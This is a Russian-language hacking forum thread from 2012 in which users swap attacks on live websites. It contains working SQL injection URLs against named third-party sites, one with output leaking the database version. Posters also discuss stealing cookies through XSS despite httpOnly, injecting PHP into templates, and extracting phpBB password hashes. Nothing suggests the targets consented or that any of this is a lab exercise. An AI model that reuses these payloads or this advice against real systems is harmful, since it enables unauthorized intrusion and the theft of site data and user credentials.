HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.07.2012, 20:13
smirk
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами: 7725206

Репутация: 26
По умолчанию

2aydin-ka

Цитата:
Сообщение от None  
http://www.tpsftz.org/page.php?cat=5&subcat=-107'+union(select+1,2,3,4,5,6,7,8,9,user(),11,12,1 3)+--+
 
Ответить с цитированием

  #2  
Старый 16.07.2012, 20:48
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от jasp3r  
в модуле блогов на phpbb нашел xss(пасивку), но почему-то кроме настроек чата и phpsession больше ничего на сниффер не приходит.
httpOnly запрещает чтение Cookie через JS.
 
Ответить с цитированием

  #3  
Старый 16.07.2012, 20:52
jasp3r
Познающий
Регистрация: 23.04.2012
Сообщений: 44
С нами: 7396886

Репутация: 0
По умолчанию

Цитата:
Сообщение от M_script  
httpOnly запрещает чтение Cookie через JS.
Спасибо, а есть возможность обойти это?
 
Ответить с цитированием

  #4  
Старый 16.07.2012, 20:54
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от HeBepHyCb  
Вот нашел я активную XSS-ку ...но меня не интересуют куки ....мне до корней сайта охота добраться, до базы и всего прочего.
XSS выполняется на стороне клиента. Выполнить код на сервере непосредственно через эту уязвимость нельзя.
 
Ответить с цитированием

  #5  
Старый 16.07.2012, 20:59
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от jasp3r  
Спасибо, а есть возможность обойти это?
1) Метод TRACE

2) Уязвимость веб-сервера

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053

3) Плагины браузера

http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html
 
Ответить с цитированием

  #6  
Старый 16.07.2012, 21:35
jasp3r
Познающий
Регистрация: 23.04.2012
Сообщений: 44
С нами: 7396886

Репутация: 0
По умолчанию

Цитата:
Сообщение от M_script  
1) Метод TRACE
2) Уязвимость веб-сервера
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053
3) Плагины браузера
http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html
Буду пробовать.

Еще в этом phpbb нашел такую штуку, в настройках юзера, там где формат даты вручную можно вводить, ввожу "> - выдает ошибку mysql:

SQL ERROR [ mysql4 ]

Data too long for column 'user_dateformat' at row 1 [1406]

при этом дата на форуме выглядит теперь вот так



Можно ли раскрутить до уязвимости?

Стоит там еще ajax chat у них, файл install не удалили, но максимум что с его помощью можно сделать, это выкинуть всех из чата, может я что-то еще не попробовал? Подсобите
 
Ответить с цитированием

  #7  
Старый 16.07.2012, 21:39
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от jasp3r  
Буду пробовать.
Еще в этом phpbb нашел такую штуку, в настройках юзера, там где формат даты вручную можно вводить, ввожу "> - выдает ошибку mysql:
SQL ERROR [ mysql4 ]
Data too long for column 'user_dateformat' at row 1 [1406]
при этом дата на форуме выглядит теперь вот так

Можно ли раскрутить до уязвимости?
Еще в репутации, похоже нифига не фильтруется, но и вывода там видимо нет:
http://tonkiimir.ru/reputation.php?u=-1+UNION+SELECT+1
Стоит там еще ajax chat у них, файл install не удалили, но максимум что с его помощью можно сделать, это выкинуть всех из чата, может я что-то еще не попробовал? Подсобите
Код:
http://tonkiimir.ru/reputation.php?u=3+or(1)group+by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))--+
Duplicate entry '5.1.58-1ubuntu1-log' for key 'group_key' [1062]
 
Ответить с цитированием

  #8  
Старый 16.07.2012, 22:56
HeBepHyCb
Новичок
Регистрация: 12.07.2008
Сообщений: 0
С нами: 9384704

Репутация: 0
По умолчанию

Цитата:
Сообщение от M_script  
XSS выполняется на стороне клиента. Выполнить код на сервере непосредственно через эту уязвимость нельзя.
Ок, тогда не подскажете, как обойти фильтрацию такого рода:

Пишу сохраняется как

Если пишу <? phpinfo() ?> то сохраняется в исходном коде точно так же, а выводится на странице нормально т.е. , но не исполняется (( Как же тогда его туды вставить ?
 
Ответить с цитированием

  #9  
Старый 17.07.2012, 00:32
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

1. Выключена обработка РНР в файлах где Вы пытаетесь его вставить.

2. short_open_tag = off

3. Попробуйте варианты {php}{/php}, ну и тому подобные, в некоторых шаблонах проходят такие варианты кода! Да и убедитесь, что тот кусок куда Вы вставляете код, не выводится системой через echo... Боюсь потому у вас и идет вывод на страницу кода РНР!

P.S. Вариантов куда больше, думайте не много и сами...
 
Ответить с цитированием

  #10  
Старый 17.07.2012, 01:07
jasp3r
Познающий
Регистрация: 23.04.2012
Сообщений: 44
С нами: 7396886

Репутация: 0
По умолчанию

в phpbb3 хэш 34 символа(вместе с $H$) в моем случае вывод максимум 31 символ

можно ли как-то сделать, чтобы выводило после 3го символа, т.е. без $H$ ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.